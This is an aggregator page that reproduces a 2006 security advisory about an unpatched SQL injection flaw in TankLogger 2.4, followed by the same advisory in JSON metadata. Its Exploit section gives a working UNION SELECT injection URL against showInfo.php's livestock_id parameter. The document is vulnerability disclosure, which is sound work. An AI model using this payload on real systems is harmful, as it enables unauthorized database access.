Search...

EV0026.txt

2006-01-15T00:00:00

ID PACKETSTORM:43074
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-15T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
TankLogger SQL Injection Vulnerability  
  
--------------------Summary----------------  
  
Software: TankLogger  
Sowtware's Web Site: http://tanklogger.sourceforge.net/  
Versions: 2.4  
Critical Level: Moderate  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
eVuln ID: EV0026  
  
-----------------Description---------------  
Vulnerable script:  
general_functions.php  
  
Variables $livestock_id tank_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
  
Condition: gpc_magic_quotes: off  
  
--------------Exploit----------------------  
SQL Injection Example:  
  
http://host/exp/tanklogger/showInfo.php?livestock_id=99'%20union%20select%201,2,3,4,5,6,7,8,9/*  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit-----------------------  
Original Advisory:  
http://evuln.com/vulns/26/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2006-01-15T00:00:00", "reporter": "Aliaksandr Hartsuyeu", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "50f8b3a5f4b4b3ec473c6f27389b66ee"}, {"key": "modified", "hash": "8a96d8d6e565c1bd06e216985d146bba"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8a96d8d6e565c1bd06e216985d146bba"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "01afaacf0e226375cfd7df98ada9fc99"}, {"key": "sourceData", "hash": "352634098bcfa8d8116605134c21f131"}, {"key": "sourceHref", "hash": "3f29867196f3ddf9737e3d92648dc816"}, {"key": "title", "hash": "cedfb4c0abef46c92f29cbb00abb7d26"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`New eVuln Advisory: \nTankLogger SQL Injection Vulnerability \n \n--------------------Summary---------------- \n \nSoftware: TankLogger \nSowtware's Web Site: http://tanklogger.sourceforge.net/ \nVersions: 2.4 \nCritical Level: Moderate \nType: SQL Injection \nClass: Remote \nStatus: Unpatched \nExploit: Available \nSolution: Not Available \nDiscovered by: Aliaksandr Hartsuyeu (eVuln.com) \neVuln ID: EV0026 \n \n-----------------Description--------------- \nVulnerable script: \ngeneral_functions.php \n \nVariables $livestock_id tank_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. \n \nCondition: gpc_magic_quotes: off \n \n--------------Exploit---------------------- \nSQL Injection Example: \n \nhttp://host/exp/tanklogger/showInfo.php?livestock_id=99'%20union%20select%201,2,3,4,5,6,7,8,9/* \n \n--------------Solution--------------------- \nNo Patch available. \n \n--------------Credit----------------------- \nOriginal Advisory: \nhttp://evuln.com/vulns/26/summary.html \n \nDiscovered by: Aliaksandr Hartsuyeu (eVuln.com) \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:16:48", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/43074/EV0026.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/43074/EV0026.txt", "title": "EV0026.txt", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:16:48"}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:48"}, "vulnersScore": -0.2}, "references": [], "id": "PACKETSTORM:43074", "hash": "1ce1dd56b14702e023e385453e38dc3206d68ae961138cbf2179e45876c9a3c2", "edition": 1, "cvelist": [], "modified": "2006-01-15T00:00:00", "description": ""}